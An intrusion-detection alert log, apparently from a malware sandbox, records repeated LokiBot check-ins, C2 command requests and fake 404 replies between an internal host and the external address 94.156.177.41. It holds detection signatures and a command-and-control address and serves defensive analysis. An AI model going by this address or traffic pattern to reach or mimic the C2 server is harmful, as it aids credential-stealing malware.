2024-11-21T01:21:11.401975+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:11.534454+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49174	TCP
2024-11-21T01:21:11.985823+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:11.985823+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:11.985823+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:13.382068+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:13.382068+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:13.501726+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49175	TCP
2024-11-21T01:21:13.850407+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:13.850407+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:13.850407+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:15.243442+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:15.243442+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:15.363233+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49176	TCP
2024-11-21T01:21:15.628174+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:15.628174+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:15.628174+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:17.082377+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:17.082377+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:17.202425+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49177	TCP
2024-11-21T01:21:17.743709+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:17.743709+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:17.743709+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:19.199416+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:19.199416+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:19.346509+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49178	TCP
2024-11-21T01:21:20.049266+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:20.049266+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:20.049266+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:21.472227+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:21.472227+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:21.623707+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49179	TCP
2024-11-21T01:21:21.907579+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:21.907579+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:21.907579+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:23.365586+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:23.365586+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:23.485202+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49180	TCP
2024-11-21T01:21:23.743037+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:23.743037+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:23.743037+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:25.118419+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:25.118419+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:25.238192+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49181	TCP
2024-11-21T01:21:25.486576+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:25.486576+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:25.486576+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:26.719111+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:26.719111+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:26.838662+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49182	TCP
2024-11-21T01:21:27.098178+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:27.098178+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:27.098178+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:28.558962+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:28.558962+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:28.679061+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49183	TCP
2024-11-21T01:21:29.018877+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:29.018877+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:29.018877+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:30.435077+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:30.435077+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:30.554763+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49184	TCP
2024-11-21T01:21:30.894519+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:30.894519+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:30.894519+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:32.330517+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:32.330517+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:32.450257+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49185	TCP
2024-11-21T01:21:32.726630+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:32.726630+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:32.726630+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:34.180186+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:34.180186+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:34.300885+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49186	TCP
2024-11-21T01:21:34.558558+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:34.558558+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:34.558558+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:35.978469+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:35.978469+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:36.098263+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49187	TCP
2024-11-21T01:21:36.365955+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:36.365955+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:36.365955+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:37.749718+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:37.749718+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:37.869361+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49188	TCP
2024-11-21T01:21:38.140042+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:38.140042+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:38.140042+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:39.546512+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:39.546512+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:39.666300+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49189	TCP
2024-11-21T01:21:39.931532+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:39.931532+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:39.931532+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:41.225623+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:41.225623+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:41.345210+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49190	TCP
2024-11-21T01:21:41.604608+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:41.604608+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:41.604608+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:43.072411+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:43.072411+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:43.192055+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49191	TCP
2024-11-21T01:21:43.448688+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:43.448688+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:43.448688+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:44.863575+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:44.863575+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:44.983412+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49192	TCP
2024-11-21T01:21:45.241866+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:45.241866+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:45.241866+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:46.669234+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:46.669234+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:46.907622+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49193	TCP
2024-11-21T01:21:47.371970+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:47.371970+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:47.371970+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:48.817665+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:48.817665+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:48.937477+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49194	TCP
2024-11-21T01:21:49.207569+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:49.207569+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:49.207569+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:50.587584+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:50.587584+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:50.707604+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49195	TCP
2024-11-21T01:21:50.964191+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:50.964191+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:50.964191+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:52.457887+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:52.457887+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:52.577552+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49196	TCP
2024-11-21T01:21:52.846976+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:52.846976+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:52.846976+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:54.325719+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:54.325719+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:54.445447+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49197	TCP
2024-11-21T01:21:54.717406+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:54.717406+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:54.717406+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:56.127939+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:56.127939+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:56.247574+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49198	TCP
2024-11-21T01:21:56.499939+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:56.499939+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:56.499939+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:57.929942+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:57.929942+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:58.050796+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49199	TCP
2024-11-21T01:21:58.317709+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:21:58.317709+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:21:58.317709+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:21:59.701729+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:21:59.701729+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:21:59.823479+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49200	TCP
2024-11-21T01:22:00.072516+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:00.072516+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:00.072516+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:01.372457+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:01.372457+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:01.492128+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49201	TCP
2024-11-21T01:22:01.774545+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:01.774545+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:01.774545+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:03.169788+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:03.169788+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:03.292326+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49202	TCP
2024-11-21T01:22:03.913790+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:03.913790+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:03.913790+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:05.316294+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:05.316294+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:05.435922+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49203	TCP
2024-11-21T01:22:05.709669+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:05.709669+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:05.709669+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:07.046260+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:07.046260+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:07.165912+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49204	TCP
2024-11-21T01:22:07.446181+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:07.446181+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:07.446181+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:08.721115+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:08.721115+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:08.852321+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49205	TCP
2024-11-21T01:22:09.167577+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:09.167577+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:09.167577+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:10.458606+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:10.458606+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:10.578296+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49206	TCP
2024-11-21T01:22:10.840995+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:10.840995+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:10.840995+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:12.256004+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:12.256004+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:12.433493+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49207	TCP
2024-11-21T01:22:13.264617+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:13.264617+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:13.264617+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49208	94.156.177.41	80	TCP
